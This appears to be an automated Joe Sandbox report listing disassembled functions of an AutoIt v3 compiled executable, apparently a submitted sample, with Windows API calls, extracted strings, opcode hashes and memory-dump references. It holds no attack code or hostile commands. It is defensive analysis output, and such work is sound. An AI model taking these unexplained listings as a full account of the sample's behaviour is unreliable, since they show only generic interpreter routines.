Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d12c089e7adc4890857e394d23f257601b70141ba52b51ab83afb96f2e6fdd2d
Instruction ID: c341a6a53f210f33f65be282c704e0f0eb18d798e4186f359bef36530e8a0681
Opcode Fuzzy Hash: d12c089e7adc4890857e394d23f257601b70141ba52b51ab83afb96f2e6fdd2d
Instruction Fuzzy Hash: 75A0113000020CAB8A002B82EC08888BFACEA002A0B008020F80C80022CB32A820AA80

Function 00EA8808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f19b08c5dde57b0ef4bc031736b421376eade4b6ab0c03c8278e99566934ce23
Instruction ID: 1d8007fb670e7ad35ca662eb923faf2d83ca09f0c1dbabe5edf9856a38d50401
Opcode Fuzzy Hash: f19b08c5dde57b0ef4bc031736b421376eade4b6ab0c03c8278e99566934ce23
Instruction Fuzzy Hash: 2E22453190458ACBCF389A25C5943BD77B1FF4A30CF28A06AD946BF5A2DB30ED91D641

Function 00EB21C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: f3b9d03e919378fbc3a880e65e103bbd53772f68e5978307919a2ab0a13c2f2d
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 6EC1A8322051930ADF2E4639C4740BFFBA15EA27B635A27ADD4B3EF1D4EE10C965D620

Function 00EB25FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: a726c53f46b076000075e39188bf390ee8332a192a402437b47ac59a5d949d06
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 33C1883221519309DF2E4639C4341BFFBA15EE27B635A27ADD4B3EB1D4EE10C925D620

Function 00EB1978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: f73a2e23eef386a30a4ace6c7e4bcb646c330c46ea7c200725fa145f6744f854
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 62C1A53221509309DF2E4639C4741BFFBA15EA27B635A27EDD4B3EB1C4EE20D925D610

Function 00F07806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00F0785B
DeleteObject.GDI32(00000000), ref: 00F0786D
DestroyWindow.USER32 ref: 00F0787B
GetDesktopWindow.USER32 ref: 00F07895
GetWindowRect.USER32(00000000), ref: 00F0789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00F079DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F079ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F07A35
GetClientRect.USER32(00000000,?), ref: 00F07A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F07A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F07A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F07AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F07ABB
GlobalLock.KERNEL32(00000000), ref: 00F07AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F07AD3
GlobalUnlock.KERNEL32(00000000), ref: 00F07ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F07AE3
GlobalFree.KERNEL32(00000000), ref: 00F07AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F07B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F22CAC,00000000), ref: 00F07B16
GlobalFree.KERNEL32(00000000), ref: 00F07B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00F07B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F07B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F07B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F07D7A

Strings

, xrefs: 00F07D00
DISPLAY, xrefs: 00F07BDD
AutoIt v3, xrefs: 00F07A2D
static, xrefs: 00F07A75, 00F07BCC

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 9ac60dc211b373f8d79321dfc0590430b7880e4c07ce4c266eed1a829db0e497
Instruction ID: 9615a707717b913c44d2a1dc7896a539262ca8404ae94be0a7d6cb6acc2bd113
Opcode Fuzzy Hash: 9ac60dc211b373f8d79321dfc0590430b7880e4c07ce4c266eed1a829db0e497
Instruction Fuzzy Hash: 48027D71900219EFDB14DFA8DC89EAE7BB9FF48310F148158F915AB2A1D770AD05EB60

Function 00F1356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00F1F910), ref: 00F13627
IsWindowVisible.USER32(?), ref: 00F1364B

Strings

CHECK, xrefs: 00F1386D
EDITPASTE, xrefs: 00F1395F
DELSTRING, xrefs: 00F13749
SELECTSTRING, xrefs: 00F13806
ISENABLED, xrefs: 00F1366B
GETCURRENTLINE, xrefs: 00F138ED
GETLINECOUNT, xrefs: 00F138C6
TABRIGHT, xrefs: 00F1369D
TABLEFT, xrefs: 00F13687
CURRENTTAB, xrefs: 00F136BD
GETCURRENTCOL, xrefs: 00F13928
GETCURRENTSELECTION, xrefs: 00F137E3
FINDSTRING, xrefs: 00F13776
HIDEDROPDOWN, xrefs: 00F13700
SETCURRENTSELECTION, xrefs: 00F137B6
GETLINE, xrefs: 00F1399B
GETSELECTED, xrefs: 00F138A3
UNCHECK, xrefs: 00F13883
ISCHECKED, xrefs: 00F13839
SENDCOMMANDID, xrefs: 00F139DA
ADDSTRING, xrefs: 00F13716
SHOWDROPDOWN, xrefs: 00F136E0
ISVISIBLE, xrefs: 00F13637

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: cd69f03a23ccdc519b0828b8c1c789bb78918f9bdf723c6f143692bceb60a0d0
Instruction ID: 35e26a5da435063ae59c16c740411c102d6082056f367c99d3d427619fb38ea7
Opcode Fuzzy Hash: cd69f03a23ccdc519b0828b8c1c789bb78918f9bdf723c6f143692bceb60a0d0
Instruction Fuzzy Hash: 89D171312083019BCB14EF14C451AAF7BE5AF95364F154858FC856B3A3DB71EE8AEB41

Function 00F1A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00F1A630
GetSysColorBrush.USER32(0000000F), ref: 00F1A661
GetSysColor.USER32(0000000F), ref: 00F1A66D
SetBkColor.GDI32(?,000000FF), ref: 00F1A687
SelectObject.GDI32(?,00000000), ref: 00F1A696
InflateRect.USER32(?,000000FF,000000FF), ref: 00F1A6C1
GetSysColor.USER32(00000010), ref: 00F1A6C9
CreateSolidBrush.GDI32(00000000), ref: 00F1A6D0
FrameRect.USER32(?,?,00000000), ref: 00F1A6DF
DeleteObject.GDI32(00000000), ref: 00F1A6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 00F1A731
FillRect.USER32(?,?,00000000), ref: 00F1A763
GetWindowLongW.USER32(?,000000F0), ref: 00F1A78E

Part of subcall function 00F1A8CA: GetSysColor.USER32(00000012), ref: 00F1A903
Part of subcall function 00F1A8CA: SetTextColor.GDI32(?,?), ref: 00F1A907
Part of subcall function 00F1A8CA: GetSysColorBrush.USER32(0000000F), ref: 00F1A91D
Part of subcall function 00F1A8CA: GetSysColor.USER32(0000000F), ref: 00F1A928
Part of subcall function 00F1A8CA: GetSysColor.USER32(00000011), ref: 00F1A945
Part of subcall function 00F1A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F1A953
Part of subcall function 00F1A8CA: SelectObject.GDI32(?,00000000), ref: 00F1A964
Part of subcall function 00F1A8CA: SetBkColor.GDI32(?,00000000), ref: 00F1A96D
Part of subcall function 00F1A8CA: SelectObject.GDI32(?,?), ref: 00F1A97A
Part of subcall function 00F1A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00F1A999
Part of subcall function 00F1A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F1A9B0
Part of subcall function 00F1A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00F1A9C5
Part of subcall function 00F1A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F1A9ED

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: c4c2b011a938952393aac96d0ba01319b756b12bd18a1a1b3fcc5b1e32da2792
Instruction ID: 8c936bd06ad1bc4636b80eb62f57005dcc2b8b0ae9dd5b4805c0a33c69b7a0ec
Opcode Fuzzy Hash: c4c2b011a938952393aac96d0ba01319b756b12bd18a1a1b3fcc5b1e32da2792
Instruction Fuzzy Hash: 1A917C72409305FFC7109F64DC08A9B7BA9FF88331F158A29F966961E1D730D948EB52

Function 00E92C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00E92CA2
DeleteObject.GDI32(00000000), ref: 00E92CE8
DeleteObject.GDI32(00000000), ref: 00E92CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00E92CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00E92D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00ECC43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00ECC474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00ECC89D

Part of subcall function 00E91B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E92036,?,00000000,?,?,?,?,00E916CB,00000000,?), ref: 00E91B9A

SendMessageW.USER32(?,00001053), ref: 00ECC8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00ECC8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ECC907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00ECC912

Strings

0, xrefs: 00ECC731

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: affdef17174653618fd4ebce12cfc6dc2863704ba4943e1631927f67d7a71959
Instruction ID: 819e083dbf125b61f31780019db4fa456c29d6f0533a9d1b5de2b3aaf39f6ff2
Opcode Fuzzy Hash: affdef17174653618fd4ebce12cfc6dc2863704ba4943e1631927f67d7a71959
Instruction Fuzzy Hash: 0A127D30600201AFDF15CF24CA84BA9B7E5FF44304F64A56DF999EB262C732E846DB91

Function 00F074AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00F074DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F0759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00F075DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F075ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00F07633
GetClientRect.USER32(00000000,?), ref: 00F0763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00F07683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F07692
GetStockObject.GDI32(00000011), ref: 00F076A2
SelectObject.GDI32(00000000,00000000), ref: 00F076A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F076B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F076BF
DeleteDC.GDI32(00000000), ref: 00F076C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F076F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 00F0770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00F07746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F0775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 00F0776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00F0779B
GetStockObject.GDI32(00000011), ref: 00F077A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F077B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F077BB

Strings

msctls_progress32, xrefs: 00F0773C
DISPLAY, xrefs: 00F07688
AutoIt v3, xrefs: 00F0762B
static, xrefs: 00F0767D, 00F07795

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: fa6750e3e8db69a898e850a2a3b8dfc4ec10b8f203fe21fe44274b329f5bd00f
Instruction ID: ca7d3ecd53fd1262ecf8ad8bc9a99d9013a4d01b179d9aeaf18af8dd5d3c74f0
Opcode Fuzzy Hash: fa6750e3e8db69a898e850a2a3b8dfc4ec10b8f203fe21fe44274b329f5bd00f
Instruction Fuzzy Hash: 77A19271A00609BFEB14DBA4DC4AFEE7BB9EB05710F008114FA14A72E0D770AD04DB64

Function 00EFAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00EFAD1E
GetDriveTypeW.KERNEL32(?,00F1FAC0,?,\\.\,00F1F910), ref: 00EFADFB
SetErrorMode.KERNEL32(00000000,00F1FAC0,?,\\.\,00F1F910), ref: 00EFAF59

Strings

SAS, xrefs: 00EFAF05
Network, xrefs: 00EFAE39
ATAPI, xrefs: 00EFAECD
FileBackedVirtual, xrefs: 00EFAF28
SCSI, xrefs: 00EFAEC6
iSCSI, xrefs: 00EFAEFE
Fixed, xrefs: 00EFAE43
MMC, xrefs: 00EFAF1A
Fibre, xrefs: 00EFAEE9
ATA, xrefs: 00EFAED4
Unknown, xrefs: 00EFAE1B, 00EFAEBF
RAID, xrefs: 00EFAEF7
SSA, xrefs: 00EFAEE2
Virtual, xrefs: 00EFAF21
\\.\, xrefs: 00EFAD70
SATA, xrefs: 00EFAF0C
Removable, xrefs: 00EFAE4D
PhysicalDrive, xrefs: 00EFADA7
1394, xrefs: 00EFAEDB
SSD, xrefs: 00EFAE86
CDROM, xrefs: 00EFAE2F
RAMDisk, xrefs: 00EFAE25
USB, xrefs: 00EFAEF0

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 9b2a3525cb10acd352df39989323db0f44f5eb7a361ac2bdeb448c69941ca414
Instruction ID: 12f8dc03db959e1dbd49b9c37b25369f2861a39264983ed69edfb36708527233
Opcode Fuzzy Hash: 9b2a3525cb10acd352df39989323db0f44f5eb7a361ac2bdeb448c69941ca414
Instruction Fuzzy Hash: 8E5183F174420DAA8B10EB10C942CFD77E2EB487447286076EA1ABF291DA71DD42EB53

Function 00E968DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00E96931
__wcsnicmp.LIBCMT ref: 00E96949
__wcsnicmp.LIBCMT ref: 00E96961
__wcsnicmp.LIBCMT ref: 00E96979
__wcsnicmp.LIBCMT ref: 00E96991
__wcsnicmp.LIBCMT ref: 00E969A9
__wcsnicmp.LIBCMT ref: 00E969C1
__wcsnicmp.LIBCMT ref: 00E969D5
__wcsnicmp.LIBCMT ref: 00E96A16
__wcsnicmp.LIBCMT ref: 00E96A2A
__wcsnicmp.LIBCMT ref: 00E96A3E
__wcsnicmp.LIBCMT ref: 00E96A52

Strings

Cannot parse #include, xrefs: 00ECE3F0
#pragma compile, xrefs: 00E9692B
#ce, xrefs: 00E96A4C
#OnAutoItStartRegister, xrefs: 00E96973
#requireadmin, xrefs: 00E9695B
#notrayicon, xrefs: 00E96943
Unterminated group of comments, xrefs: 00ECE403
#cs, xrefs: 00E969CF, 00E96A24
#comments-start, xrefs: 00E969BB, 00E96A10
Bad directive syntax error, xrefs: 00ECE31A
#comments-end, xrefs: 00E96A38
#include-once, xrefs: 00E9698B
#include, xrefs: 00E969A3

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 190888950b1f0852b0f2df106e9fab89c9d319b4dfd5926d092250f9dda1ab46
Instruction ID: 418d84a4c371c4da055caa595795506934f52b46e5faa6b07b901182456083e0
Opcode Fuzzy Hash: 190888950b1f0852b0f2df106e9fab89c9d319b4dfd5926d092250f9dda1ab46
Instruction Fuzzy Hash: BB8117B1600215BACF21AB74EC43FFF37A8AF05744F046026F905BA192EF61DE46D291

Function 00F19A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00F19AD2
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00F19B8B
SendMessageW.USER32(?,00001102,00000002,?), ref: 00F19BA7

Strings

0, xrefs: 00F19BE4

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend$Window
String ID: 0
API String ID: 2326795674-4108050209
Opcode ID: c247bcf2245d737eb947f7d2c84511250d2e36ca95481b52e15b9861f377b4ed
Instruction ID: dbaf613ac42fd5ebad2076be48ae79602ccbfd6263c15cc35a314d377e59a7e3
Opcode Fuzzy Hash: c247bcf2245d737eb947f7d2c84511250d2e36ca95481b52e15b9861f377b4ed
Instruction Fuzzy Hash: C3020331508301AFDB15CF24C868BEABBE5FF49324F04852CF995D62A1C7B4D985EB92

Function 00F1A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00F1A903
SetTextColor.GDI32(?,?), ref: 00F1A907
